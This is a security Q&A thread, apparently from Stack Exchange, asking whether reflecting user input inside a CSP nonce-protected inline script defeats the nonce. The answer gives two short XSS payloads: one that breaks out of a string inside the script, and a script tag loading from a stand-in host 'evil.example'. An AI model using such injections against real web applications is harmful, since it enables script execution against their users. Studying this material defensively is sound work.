
I stumbled upon a web app which is accepting user input and putting it into a variable within a script tag.

The script tag does have a nonce attribute.


As I am working on bypassing the XSS filter, I had the thought that this practice of reflecting user input within an inline script with a nonce attribute defeats the purpose of using it.

Is my understanding correct, or am I missing something here?

Rahul

1 Answer


reflecting user input within an inline script with nonce attribute beats the purpose of using it.

That depends on the type of injection you achieve.

If you manage to construct an XSS vector that stays within the nonce'd script tag, you're right: it's useless. You can just inject additional script code via e.g. "; alert(); //.

But if you're forced to close the script tag (say, because <, > are allowed but " is not) via e.g. </script><script src=evil.example>..., then the CSP works out, because you can't successfully inject new scripts without knowing the correct nonce.

Note that in the past, nonce exfiltration techniques and other nonce-related browser bugs have come up that may have rendered the second case exploitable, too. Have a look at this talk by Spagnuolo/Weichselbaum.

Arminius
  • Thank you for the answer and for bringing inserting a script tag to my notice. I will keep this question open for more answers. – Rahul Aug 24 '20 at 08:11